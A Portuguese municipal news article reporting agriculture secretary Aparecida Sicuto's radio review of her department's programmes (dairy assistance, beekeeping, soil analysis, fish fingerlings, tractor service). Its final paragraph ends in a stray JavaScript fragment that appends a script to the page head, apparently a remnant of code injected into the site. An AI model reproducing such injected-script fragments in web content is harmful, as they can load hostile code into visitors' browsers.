Capa / Agropecuária / Aparecida Sicuto avalia 10 meses frente à Agricultura

Aparecida Sicuto avalia 10 meses frente à Agricultura

12068417_948965305164093_7128947705309969182_oGiselle Oliveira
Assessoria

A Secretária de Agricultura, Pecuária e Desenvolvimento, Aparecida Sicuto em entrevista ao radialista Cícero Tavares durante o Programa Notícias do Paço Municipal que vai ao ar pela Rádio Progresso, fez uma prestação de contas para os ouvintes sobre as ações da pasta desde que assumiu em fevereiro de 2015.
Sicuto iniciou o programa falando dos trabalhos que continuam sendo desenvolvidos pela pasta, uma das prioridades é proporcionar melhor atendimento ao produtor rural do município. “Contamos com 4 engenheiros agrônomos que atuam com a assistência técnica junto aos produtores rurais em diversas atividades, uma delas é o programa Balde Cheio, desenvolvido desde 2013, que surgiu por meio de parceira da Companhia Hidrelétrica Teles Pires (CHTP) e do Serviço Brasileiro de Apoio as Micro e Pequenas Empresas (SEBRAE/MT), trabalhamos nesta ação para que mais produtores participem do Balde Cheio, frisou.
Outra ação importante da pasta é o fortalecimento da apicultura no município, com a Consultoria de Apicultura, que abrange os municípios da região em parceria com a secretaria e com o Sebrae. “A qualificação do produtor de mel e o conhecimento do manejo adequado para as colmeias são fundamentais para o crescimento da apicultura, e uma das ações da administração municipal é fortalecer o desenvolvimento da cadeia produtiva do mel”, destaca.
Uma parceria entre a Secretaria de Agricultura e a Universidade Estadual de Mato Grosso (UNEMAT) permite a análise de solo no Laboratório de Solos e Análises Foliar da Unemat, por meio da ação de extensão rural – que viabiliza a realização de análises de solo de agricultores da região.
Já na área da piscicultura, a secretária Aparecida Sicuto, frisou que a pasta conta com um técnico que atua com a produção de alevinos, somente no ano de 2015, foram distribuídos aproximadamente 80 mil alevinos de forma gratuita para produtores rurais. “Neste momento estamos com duas ações para fortalecer e melhorar o que já existe: uma é a elaboração de um projeto para buscar recursos junto ao Governo Estadual para ampliação e reforma do local, e a limpeza dos tanques de piscicultura para iniciar a produção de 2016”, ressalta a secretária.
Aparecida Sicuto frisou também que outra ação é o serviço de trator, cujo trabalho é realizado em propriedades e chácaras próximas ao perímetro urbano, o objetivo é auxiliar os trabalhos no campo, dentre os atendidos estão produtores de maracujá, milho, mandioca, melancia, hortaliças, dentre outros, onde são promovidos os trabalhos de gradeamento e limpeza da área, o serviço é disponibilizado para propriedade de até 3 alqueires, preferencialmente próximos a cidade, dentre os setores atendidos estão a comunidade Centralzinha, Guadalupe, Santíssima Trindade, Jardim Panorama, bairro Boa Nova e Cidade Alta.
A gestora destaca que há outras atividades como o apoio para retirada de curva de nível, trabalho da pasta, que serve para identificar e unir todos os pontos de igual altitude de certo lugar, além da distribuição de nitrogênio para produtores (desde que estes tenham seus botijões) é só comparecer na secretaria e retirar a requisição. Além de um convênio com a Sefaz para emissão de guias de ITR, GTA, Licenças, baixas, seguros dentre outros.
Outro ponto importante foi à reativação do Conselho Municipal de Desenvolvimento Rural Sustentável (CMDRS) em 2015, para auxiliar os produtores rurais em suas cobranças e melhorias para o homem do campo.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top